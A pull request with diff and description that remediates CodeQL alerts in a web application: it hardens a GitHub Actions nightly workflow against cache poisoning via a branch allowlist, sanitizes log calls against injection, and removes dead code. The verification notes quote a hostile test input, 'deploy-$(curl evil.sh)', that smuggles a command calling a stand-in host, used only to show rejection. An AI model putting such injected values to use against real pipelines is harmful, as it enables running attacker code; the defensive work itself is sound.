### PR TITLE
security: remediate CodeQL alerts (11 high, 20 medium, 9 note)

### DIFF
--- a/.github/workflows/nightly.yml
+++ b/.github/workflows/nightly.yml
@@ -10,6 +10,22 @@
 #   all                                Run all tracks with default branches
 #                                      (tests + deploy + e2e on develop)
 #
+#   <branch> MUST be `main` or `develop`. Any other branch is rejected with an
+#   error. This is a security boundary, not an oversight: the workflow is
+#   triggered by `schedule`/`workflow_dispatch`, so it runs in the context of the
+#   default branch and its jobs can WRITE the default-branch GitHub Actions cache
+#   scope. Checking out an arbitrary ref would let unreviewed code execute while
+#   holding that cache token and poison entries that privileged workflows later
+#   restore (CWE-349; CodeQL actions/cache-poisoning/*).
+#
+#   The refs are assigned as literal strings in the parser below rather than
+#   sliced out of the track token — keep it that way, so attacker-influenced
+#   text never reaches a `ref:`.
+#
+#   To exercise a feature branch, open a pull request: tests.yml runs per-PR in a
+#   non-privileged context. To make another long-lived branch nightly-testable,
+#   add explicit cases for it in the parser below.
+#
 # Examples:
 #   test-backend-develop
 #   test-frontend-main,test-backend-main
@@ -121,25 +137,58 @@ jobs:
                   run_e2e=true
                   e2e_ref="develop"
                   ;;
-                test-backend-*)
+                test-backend-main)
                   run_test_backend=true
-                  test_backend_ref="${token#test-backend-}"
+                  test_backend_ref="main"
                   ;;
-                test-frontend-*)
+                test-backend-develop)
+                  run_test_backend=true
+                  test_backend_ref="develop"
+                  ;;
+                test-frontend-main)
                   run_test_frontend=true
-                  test_frontend_ref="${token#test-frontend-}"
+                  test_frontend_ref="main"
                   ;;
-                deploy-*)
+                test-frontend-develop)
+                  run_test_frontend=true
+                  test_frontend_ref="develop"
+                  ;;
+                deploy-main)
                   run_deploy=true
-                  deploy_ref="${token#deploy-}"
+                  deploy_ref="main"
                   ;;
-                scan-images-*)
+                deploy-develop)
+                  run_deploy=true
+                  deploy_ref="develop"
+                  ;;
+                scan-images-main)
                   run_scan_images=true
-                  scan_images_ref="${token#scan-images-}"
+                  scan_images_ref="main"
                   ;;
-                e2e-*)
+                scan-images-develop)
+                  run_scan_images=true
+                  scan_images_ref="develop"
+                  ;;
+                e2e-main)
                   run_e2e=true
-                  e2e_ref="${token#e2e-}"
+                  e2e_ref="main"
+                  ;;
+                e2e-develop)
+                  run_e2e=true
+                  e2e_ref="develop"
+                  ;;
+                test-backend-*|test-frontend-*|deploy-*|scan-images-*|e2e-*)
+                  # Refuse any branch outside the allowlist above. This workflow
+                  # runs on `schedule`/`workflow_dispatch`, i.e. in the context of
+                  # the default branch, where the job can WRITE the default-branch
+                  # Actions cache scope. Checking out an arbitrary ref here would
+                  # let unreviewed code run with that cache token and poison
+                  # entries that privileged workflows later restore
+                  # (CWE-349; CodeQL actions/cache-poisoning/*).
+                  echo "::error::Track '$token' names a branch outside the allowlist (main, develop)."
+                  echo "::error::Nightly runs privileged; testing an arbitrary branch here risks Actions cache poisoning."
+                  echo "::error::To test another branch, open a PR (tests.yml runs per-PR) or add the branch to the allowlist in this workflow."
+                  exit 1
                   ;;
                 *)
                   echo "::warning::Unknown track token: $token"

--- a/backend/scripts/backfill_session_static_sk.py
+++ b/backend/scripts/backfill_session_static_sk.py
@@ -33,7 +33,7 @@ import argparse
 import logging
 import os
 import time
-from typing import Any, Dict, Optional, Tuple
+from typing import Any, Dict, Optional
 
 import boto3
 from boto3.dynamodb.conditions import Attr

--- a/backend/src/agents/main_agent/quota/repository.py
+++ b/backend/src/agents/main_agent/quota/repository.py
@@ -8,6 +8,7 @@ import logging
 import os
 from .models import QuotaTier, QuotaAssignment, QuotaEvent, QuotaAssignmentType, QuotaOverride
 from agents.main_agent.config.constants import EnvVars, Defaults
+from apis.shared.security.log_sanitize import scrub_log
 
 logger = logging.getLogger(__name__)
 
@@ -54,7 +55,7 @@ class QuotaRepository:
 
             return QuotaTier(**item)
         except ClientError as e:
-            logger.error(f"Error getting tier {tier_id}: {e}")
+            logger.error(f"Error getting tier {scrub_log(tier_id)}: {scrub_log(e)}")
             return None
 
     async def list_tiers(self, enabled_only: bool = False) -> List[QuotaTier]:
@@ -140,7 +141,7 @@ class QuotaRepository:
 
             return QuotaTier(**item)
         except ClientError as e:
-            logger.error(f"Error updating tier {tier_id}: {e}")
+            logger.error(f"Error updating tier {scrub_log(tier_id)}: {scrub_log(e)}")
             return None
 
     async def delete_tier(self, tier_id: str) -> bool:
@@ -154,7 +155,7 @@ class QuotaRepository:
             )
             return True
         except ClientError as e:
-            logger.error(f"Error deleting tier {tier_id}: {e}")
+            logger.error(f"Error deleting tier {scrub_log(tier_id)}: {scrub_log(e)}")
             return False
 
     # ========== Quota Assignments ==========
@@ -179,7 +180,7 @@ class QuotaRepository:
 
             return QuotaAssignment(**item)
         except ClientError as e:
-            logger.error(f"Error getting assignment {assignment_id}: {e}")
+            logger.error(f"Error getting assignment {scrub_log(assignment_id)}: {scrub_log(e)}")
             return None
 
     async def query_user_assignment(self, user_id: str) -> Optional[QuotaAssignment]:
@@ -208,7 +209,7 @@ class QuotaRepository:
 
             return QuotaAssignment(**item)
         except ClientError as e:
-            logger.error(f"Error querying user assignment for {user_id}: {e}")
+            logger.error(f"Error querying user assignment for {scrub_log(user_id)}: {scrub_log(e)}")
             return None
 
     async def query_app_role_assignments(self, app_role_id: str) -> List[QuotaAssignment]:
@@ -235,7 +236,7 @@ class QuotaRepository:
 
             return assignments
         except ClientError as e:
-            logger.error(f"Error querying app role assignments for {app_role_id}: {e}")
+            logger.error(f"Error querying app role assignments for {scrub_log(app_role_id)}: {scrub_log(e)}")
             return []
 
     async def query_role_assignments(self, role: str) -> List[QuotaAssignment]:
@@ -298,7 +299,7 @@ class QuotaRepository:
 
             return assignments
         except ClientError as e:
-            logger.error(f"Error listing assignments for type {assignment_type}: {e}")
+            logger.error(f"Error listing assignments for type {scrub_log(assignment_type)}: {scrub_log(e)}")
             return []
 
     async def list_all_assignments(self, enabled_only: bool = False) -> List[QuotaAssignment]:
@@ -388,7 +389,7 @@ class QuotaRepository:
 
             return QuotaAssignment(**item)
         except ClientError as e:
-            logger.error(f"Error updating assignment {assignment_id}: {e}")
+            logger.error(f"Error updating assignment {scrub_log(assignment_id)}: {scrub_log(e)}")
             return None
 
     async def delete_assignment(self, assignment_id: str) -> bool:
@@ -402,7 +403,7 @@ class QuotaRepository:
             )
             return True
         except ClientError as e:
-            logger.error(f"Error deleting assignment {assignment_id}: {e}")
+            logger.error(f"Error deleting assignment {scrub_log(assignment_id)}: {scrub_log(e)}")
             return False
 
     def _build_gsi_keys(self, assignment: QuotaAssignment) -> dict:
@@ -478,7 +479,7 @@ class QuotaRepository:
 
             return events
         except ClientError as e:
-            logger.error(f"Error getting events for user {user_id}: {e}")
+            logger.error(f"Error getting events for user {scrub_log(user_id)}: {scrub_log(e)}")
             return []
 
     async def get_tier_events(
@@ -512,7 +513,7 @@ class QuotaRepository:
 
             return events
         except ClientError as e:
-            logger.error(f"Error getting events for tier {tier_id}: {e}")
+            logger.error(f"Error getting events for tier {scrub_log(tier_id)}: {scrub_log(e)}")
             return []
 
     async def get_recent_event(
@@ -587,7 +588,7 @@ class QuotaRepository:
 
             return QuotaOverride(**item)
         except ClientError as e:
-            logger.error(f"Error getting override {override_id}: {e}")
+            logger.error(f"Error getting override {scrub_log(override_id)}: {scrub_log(e)}")
             return None
 
     async def get_active_override(self, user_id: str) -> Optional[QuotaOverride]:
@@ -709,7 +710,7 @@ class QuotaRepository:
 
             return QuotaOverride(**item)
         except ClientError as e:
-            logger.error(f"Error updating override {override_id}: {e}")
+            logger.error(f"Error updating override {scrub_log(override_id)}: {scrub_log(e)}")
             return None
 
     async def delete_override(self, override_id: str) -> bool:
@@ -723,5 +724,5 @@ class QuotaRepository:
             )
             return True
         except ClientError as e:
-            logger.error(f"Error deleting override {override_id}: {e}")
+            logger.error(f"Error deleting override {scrub_log(override_id)}: {scrub_log(e)}")
             return False

--- a/backend/src/agents/main_agent/quota/resolver.py
+++ b/backend/src/agents/main_agent/quota/resolver.py
@@ -6,6 +6,7 @@ import logging
 from apis.shared.auth.models import User
 from .models import QuotaTier, QuotaAssignment, ResolvedQuota
 from .repository import QuotaRepository
+from apis.shared.security.log_sanitize import scrub_log
 
 logger = logging.getLogger(__name__)
 
@@ -208,7 +209,7 @@ class QuotaResolver:
             keys_to_remove = [k for k in self._cache.keys() if k.startswith(f"{user_id}:")]
             for key in keys_to_remove:
                 del self._cache[key]
-            logger.info(f"Invalidated cache for user {user_id}")
+            logger.info(f"Invalidated cache for user {scrub_log(user_id)}")
         else:
             # Clear entire cache
             self._cache.clear()

--- a/backend/src/agents/main_agent/tools/gateway_integration.py
+++ b/backend/src/agents/main_agent/tools/gateway_integration.py
@@ -8,6 +8,7 @@ from agents.main_agent.integrations.gateway_mcp_client import (
     get_gateway_client_if_enabled,
 )
 from apis.shared.tools.scoped_ids import parse_scoped_tool_id
+from apis.shared.security.log_sanitize import scrub_log
 
 logger = logging.getLogger(__name__)
 
@@ -59,7 +60,7 @@ async def expand_gateway_tool_ids(
             else:
                 logger.warning(
                     "Cannot resolve scoped gateway tool '%s' (no target_name); skipping",
-                    tool_id,
+                    scrub_log(tool_id),
                 )
             continue
 

--- a/backend/src/apis/app_api/agent_designer/routes.py
+++ b/backend/src/apis/app_api/agent_designer/routes.py
@@ -355,7 +355,7 @@ async def list_bindable_endpoint(
     except ValueError as e:
         raise HTTPException(status_code=400, detail=str(e))
     except Exception as e:
-        logger.error(f"Error listing bindable '{kind}': {e}", exc_info=True)
+        logger.error(f"Error listing bindable '{scrub_log(kind)}': {scrub_log(e)}", exc_info=True)
         raise HTTPException(status_code=500, detail=f"Failed to list bindable '{kind}': {str(e)}")
 
 

--- a/backend/src/apis/app_api/kb_sync/worker.py
+++ b/backend/src/apis/app_api/kb_sync/worker.py
@@ -65,8 +65,6 @@ from apis.app_api.kb_sync import records
 logger = logging.getLogger(__name__)
 logger.setLevel(logging.INFO)
 
-_NATIVE_PREFIX = "application/vnd.google-apps."
-
 
 def _now_timestamp() -> str:
     # Normalize the +00:00 offset to a single trailing Z; "…+00:00Z" (offset AND

--- a/backend/src/apis/app_api/kb_upgrade/routes.py
+++ b/backend/src/apis/app_api/kb_upgrade/routes.py
@@ -28,6 +28,7 @@ from apis.app_api.kb_upgrade.service import (
 )
 from apis.shared.assistants.service import resolve_assistant_permission
 from apis.shared.auth import User, get_current_user_from_session
+from apis.shared.security.log_sanitize import scrub_log
 
 logger = logging.getLogger(__name__)
 
@@ -88,7 +89,7 @@ async def read_upgrade_status(
         # unavailable upgrade card would be a strictly worse outcome. Logged at
         # error so the failure is not silent.
         logger.error(
-            f"kb {assistant_id}: could not derive upgrade status: {exc}",
+            f"kb {scrub_log(assistant_id)}: could not derive upgrade status: {scrub_log(exc)}",
             exc_info=True,
         )
         return UpgradeStatusResponse(phase="none", canUpgrade=False)

--- a/backend/src/apis/app_api/memory_spaces/models.py
+++ b/backend/src/apis/app_api/memory_spaces/models.py
@@ -7,7 +7,7 @@ matching the assistants/schedules API models.
 
 from __future__ import annotations
 
-from typing import Any, Dict, List, Optional
+from typing import Any, Dict, List
 
 from pydantic import BaseModel, ConfigDict, Field
 

--- a/backend/src/apis/app_api/memory_spaces/routes.py
+++ b/backend/src/apis/app_api/memory_spaces/routes.py
@@ -42,6 +42,7 @@ from apis.shared.memory.service import (
 )
 from apis.shared.memory.store import MemorySpaceStoreError
 
+from apis.shared.security.log_sanitize import scrub_log
 from apis.app_api.memory_spaces.models import (
     ConsolidateRequest,
     ConsolidationReportResponse,
@@ -252,7 +253,7 @@ def export_space(
     except MemorySpaceError as e:
         raise _translate(e)
     except MemorySpaceStoreError as e:
-        logger.error("memory-spaces: export failed for space=%s: %s", space_id, e)
+        logger.error("memory-spaces: export failed for space=%s: %s", scrub_log(space_id), scrub_log(e))
         raise HTTPException(
             status_code=status.HTTP_500_INTERNAL_SERVER_ERROR,
             detail="failed to read memory space contents for export",
@@ -292,7 +293,7 @@ def consolidate_space(
     except MemorySpaceError as e:
         raise _translate(e)
     except MemorySpaceStoreError as e:
-        logger.error("memory-spaces: consolidate failed for space=%s: %s", space_id, e)
+        logger.error("memory-spaces: consolidate failed for space=%s: %s", scrub_log(space_id), scrub_log(e))
         raise HTTPException(
             status_code=status.HTTP_500_INTERNAL_SERVER_ERROR,
             detail="failed to consolidate memory space storage",

--- a/backend/src/apis/app_api/skills/service.py
+++ b/backend/src/apis/app_api/skills/service.py
@@ -31,6 +31,7 @@ from apis.shared.skills.repository import (
 )
 from apis.shared.skills.bundle import generate_skill_md
 from apis.shared.skills.resource_types import resolve_upload_content_type
+from apis.shared.security.log_sanitize import scrub_log
 from apis.shared.skills.resource_store import (
     SkillResourceStore,
     SkillResourceStoreError,
@@ -192,7 +193,7 @@ class SkillCatalogService:
         self._write_skill_md(created)
 
         logger.info(
-            f"Admin {admin.email} created skill: {skill.skill_id}",
+            f"Admin {scrub_log(admin.email)} created skill: {scrub_log(skill.skill_id)}",
             extra={
                 "event": "skill_created",
                 "skill_id": skill.skill_id,
@@ -233,7 +234,7 @@ class SkillCatalogService:
             # is cheap and idempotent.
             self._write_skill_md(updated)
             logger.info(
-                f"Admin {admin.email} updated skill: {skill_id}",
+                f"Admin {scrub_log(admin.email)} updated skill: {scrub_log(skill_id)}",
                 extra={
                     "event": "skill_updated",
                     "skill_id": skill_id,
@@ -275,7 +276,7 @@ class SkillCatalogService:
 
         if deleted:
             logger.info(
-                f"Admin {admin.email} deleted skill: {skill_id}",
+                f"Admin {scrub_log(admin.email)} deleted skill: {scrub_log(skill_id)}",
                 extra={
                     "event": "skill_deleted",
                     "skill_id": skill_id,
@@ -397,7 +398,7 @@ class SkillCatalogService:
         self._gc_orphaned(existing, new_resources)
 
         logger.info(
-            f"Admin {admin.email} uploaded reference file to skill {skill_id}",
+            f"Admin {scrub_log(admin.email)} uploaded reference file to skill {scrub_log(skill_id)}",
             extra={
                 "event": "skill_resource_added",
                 "skill_id": skill_id,
@@ -456,7 +457,7 @@ class SkillCatalogService:
         self._gc_orphaned(existing, new_resources)
 
         logger.info(
-            f"Admin {admin.email} deleted reference file from skill {skill_id}",
+            f"Admin {scrub_log(admin.email)} deleted reference file from skill {scrub_log(skill_id)}",
             extra={
                 "event": "skill_resource_deleted",
                 "skill_id": skill_id,
@@ -628,7 +629,7 @@ class SkillCatalogService:
             await self._remove_skill_from_role(role_id, skill_id, admin)
 
         logger.info(
-            f"Admin {admin.email} set roles for skill {skill_id}",
+            f"Admin {scrub_log(admin.email)} set roles for skill {scrub_log(skill_id)}",
             extra={
                 "event": "skill_roles_updated",
                 "skill_id": skill_id,

--- a/backend/src/apis/app_api/skills/user_service.py
+++ b/backend/src/apis/app_api/skills/user_service.py
@@ -31,6 +31,7 @@ from apis.shared.skills.repository import (
 )
 
 from .service import SkillCatalogService, get_skill_catalog_service
+from apis.shared.security.log_sanitize import scrub_log
 
 logger = logging.getLogger(__name__)
 
@@ -179,7 +180,7 @@ class UserSkillService:
         self._invalidate(skill_id)
 
         logger.info(
-            f"User {user.email} created skill: {skill_id}",
+            f"User {scrub_log(user.email)} created skill: {scrub_log(skill_id)}",
             extra={
                 "event": "user_skill_created",
                 "skill_id": skill_id,
@@ -209,7 +210,7 @@ class UserSkillService:
         self._invalidate(skill_id)
 
         logger.info(
-            f"User {user.email} updated skill: {skill_id}",
+            f"User {scrub_log(user.email)} updated skill: {scrub_log(skill_id)}",
             extra={
                 "event": "user_skill_updated",
                 "skill_id": skill_id,
@@ -238,7 +239,7 @@ class UserSkillService:
         self._invalidate(skill_id)
 
         logger.info(
-            f"User {user.email} deleted skill: {skill_id}",
+            f"User {scrub_log(user.email)} deleted skill: {scrub_log(skill_id)}",
             extra={
                 "event": "user_skill_deleted",
                 "skill_id": skill_id,

--- a/backend/src/apis/inference_api/chat/routes.py
+++ b/backend/src/apis/inference_api/chat/routes.py
@@ -8,7 +8,6 @@ These endpoints are at the root level to comply with AWS Bedrock AgentCore Runti
 """
 
 import asyncio
-import contextlib
 import json
 import logging
 from typing import AsyncGenerator, Optional, Union
@@ -1911,7 +1910,7 @@ async def invocations(request: InvocationRequest, current_user: User = Depends(g
         # answerable without knowing whether the turn ran an approved snapshot or a draft.
         logger.info(
             "Agent configuration for this turn: %s",
-            f"published version {resolved_version}" if resolved_version else "live record / draft",
+            f"published version {scrub_log(resolved_version)}" if resolved_version else "live record / draft",
         )
 
         # ⚠️ Both bookkeeping writes below are skipped for a reviewer preview, because a

--- a/backend/src/apis/shared/auth_providers/models.py
+++ b/backend/src/apis/shared/auth_providers/models.py
@@ -47,8 +47,8 @@ class AuthProvider:
     logo_url: Optional[str] = None
     button_color: Optional[str] = None
     # Metadata
-    created_at: str = field(default_factory=lambda: utc_now_iso())
-    updated_at: str = field(default_factory=lambda: utc_now_iso())
+    created_at: str = field(default_factory=utc_now_iso)
+    updated_at: str = field(default_factory=utc_now_iso)
     created_by: Optional[str] = None
     # Cognito federated identity provider name
     cognito_provider_name: Optional[str] = None

--- a/backend/src/apis/shared/files/workspace.py
+++ b/backend/src/apis/shared/files/workspace.py
@@ -26,7 +26,7 @@ import os
 import re
 import uuid
 from datetime import datetime, timezone
-from typing import Any, Dict, List, Optional
+from typing import Any, Dict, Optional
 
 import boto3
 from botocore.config import Config

--- a/backend/src/apis/shared/harness/governance.py
+++ b/backend/src/apis/shared/harness/governance.py
@@ -38,7 +38,7 @@ import hashlib
 import logging
 import os
 from datetime import datetime, timezone
-from typing import Any, Dict, Optional
+from typing import Any, Optional
 
 import boto3
 

--- a/backend/src/apis/shared/oauth/models.py
+++ b/backend/src/apis/shared/oauth/models.py
@@ -137,8 +137,8 @@ class OAuthProvider:
     # and an export target (e.g. a combined-scope Drive connector). Validated
     # in the admin route for the same reason as above.
     export_target_adapter_id: Optional[str] = None
-    created_at: str = field(default_factory=lambda: utc_now_iso())
-    updated_at: str = field(default_factory=lambda: utc_now_iso())
+    created_at: str = field(default_factory=utc_now_iso)
+    updated_at: str = field(default_factory=utc_now_iso)
 
     @property
     def scopes_hash(self) -> str:

--- a/backend/src/apis/shared/scheduled_prompts/service.py
+++ b/backend/src/apis/shared/scheduled_prompts/service.py
@@ -55,8 +55,6 @@ UNSET = _Unset()
 
 DEFAULT_MAX_SCHEDULES_PER_USER = 20
 
-_WEEKDAY_CADENCES = {"weekday"}  # Monday-Friday
-
 
 class ScheduledPromptLimitExceeded(Exception):
     """Raised when a user already has the maximum number of schedules."""

--- a/backend/src/apis/shared/skills/repository.py
+++ b/backend/src/apis/shared/skills/repository.py
@@ -23,7 +23,7 @@ import boto3
 from boto3.dynamodb.conditions import Key
 from botocore.exceptions import ClientError
 
-from .models import SYSTEM_OWNER_ID, SkillDefinition, SkillStatus, UserSkillPreference
+from .models import SkillDefinition, SkillStatus, UserSkillPreference
 
 logger = logging.getLogger(__name__)
 

--- a/frontend/ai.client/src/app/admin/costs/pages/session-cost-anatomy.page.ts
+++ b/frontend/ai.client/src/app/admin/costs/pages/session-cost-anatomy.page.ts
@@ -14,7 +14,7 @@ import { firstValueFrom } from 'rxjs';
 import { NgIcon, provideIcons } from '@ng-icons/core';
 import { heroArrowLeft, heroChevronDown } from '@ng-icons/heroicons/outline';
 import { AdminCostHttpService } from '../services/admin-cost-http.service';
-import { CacheStatus, SessionCallRow } from '../models';
+import { CacheStatus } from '../models';
 import {
   AnatomyRow,
   FINGERPRINT_KEYS,


### PR DESCRIPTION
Addresses 40 of 64 open CodeQL alerts. The remaining 24 are either false positives that should be dismissed rather than "fixed" (see below) or await confirmation from the next scan.

High (11) + medium untrusted-checkout (1) — one root cause
  .github/workflows/nightly.yml resolved track branches by slicing the
  user-supplied tracks string:  test_backend_ref="${token#test-backend-}".
  That value reaches every `ref:` in the workflow (9 checkouts) and, via
  nightly-deploy-pipeline.yml, the `ref` input of tests.yml — which is
  why the 3 tests.yml alerts and the 8 nightly.yml alerts are the same
  bug. Every other tests.yml caller (ci.yml, platform.yml, backend.yml,
  frontend-deploy.yml) omits `ref` and so inherits the trusted
  triggering ref.

  nightly runs on schedule/workflow_dispatch, i.e. in the context of the
  default branch, where jobs can WRITE the default-branch Actions cache
  scope. Checking out an arbitrary ref there lets unreviewed code run
  holding the cache token and poison entries that privileged workflows
  later restore (CWE-349).

  Fix: the track parser now matches explicit tokens and assigns branch
  names as LITERALS (test-backend-main -> "main"), instead of slicing
  them out of input. Any branch outside the allowlist is rejected with
  exit 1. Assigning literals is the point: it removes the dataflow from
  input to `ref:` entirely — only control flow depends on the input.

  BEHAVIOUR CHANGE: nightly can no longer test arbitrary feature
  branches; <branch> must be main or develop. Per the CodeQL query help
  the documented remediation is "never run untrusted code in the context
  of the default branch", and their own incorrect-usage example already
  carries permissions:{} — so tightening permissions is not a fix and
  there is no way to keep arbitrary-branch testing on a privileged
  trigger. Use a pull request (tests.yml runs per-PR, unprivileged), or
  add an explicit case to the allowlist.

  tests.yml is unchanged: its taint source was upstream.

Medium — py/log-injection (20 of 32 sites, all 10 files)
  Wrapped user-influenced values with the existing
  apis.shared.security.log_sanitize.scrub_log helper so CR/LF in an id,
  email or error message cannot forge log lines:
    quota/repository.py (14), skills/service.py, skills/user_service.py,
    memory_spaces/routes.py (2), quota/resolver.py,
    tools/gateway_integration.py, kb_upgrade/routes.py,
    agent_designer/routes.py, inference_api/chat/routes.py
  skills/{service,user_service}.py had six further identical log calls
  CodeQL had not flagged; those are sanitized too, since inconsistent
  sanitization inside one file is a maintenance hazard.

Note — dead code (9 of 20)
  Removed 6 unused imports (backfill_session_static_sk.py, memory_spaces
  /models.py, inference_api/chat/routes.py, shared/files/workspace.py,
  shared/harness/governance.py, shared/skills/repository.py), 1 unused
  frontend import (session-cost-anatomy.page.ts), and 2 genuinely dead
  constants (_NATIVE_PREFIX in kb_sync/worker.py — the live copy lives in
  file_sources/adapters/google_drive.py; _WEEKDAY_CADENCES in
  scheduled_prompts/service.py). Replaced 4 `lambda: utc_now_iso()`
  wrappers with `utc_now_iso` in auth_providers/models.py and
  oauth/models.py.

False positives — recommend dismissing, not patching
  py/ineffectual-statement x4 (shared/kb_backend/protocol.py:147,151,155
    and shared/harness/auth.py:65) are `...` bodies of Protocol method
    stubs. Required syntax; removing them is a SyntaxError.
  py/unused-global-variable _NO_CI_MESSAGE (builtin_tools/office/
    _storage.py:366) is imported and used by word_document_tool.py,
    excel_spreadsheet_tool.py and powerpoint_presentation_tool.py.
  py/unused-global-variable _migration_complete_cache (shared/sessions/
    metadata.py:2331) is a correct memoization: `global` is declared at
    line 2325 and the value is read at 2326 on the next call.
  py/unused-global-variable logger (shared/assistants/kb_publication.py
    :51) is a genuinely unused module logger; left in place as removing
    it is churn with no benefit.

Verification
  backend  6962 passed / 32 failed / 6 skipped — identical to the
           pre-change baseline, so no regression. The 32 are pre-existing
           full-suite pollution (module-level _cached_signing_key /
           _secrets_client globals in app_api/artifacts/service.py);
           both affected modules pass 84/84 in isolation.
  ruff     167 -> 162 errors (all pre-existing; none introduced)
  imports  all 17 edited modules import cleanly
  frontend tsc --noEmit exit 0
  workflow nightly.yml parses as YAML; the track parser was extracted and
           executed directly — `all`, test-backend-develop,
           test-frontend-main+test-backend-main, deploy+e2e-develop and
           scan-images-main all resolve to literal main/develop (rc=0),
           while `test-backend-attacker-branch` and
           `deploy-$(curl evil.sh)` are both rejected (rc=1) and an
           unknown token still only warns.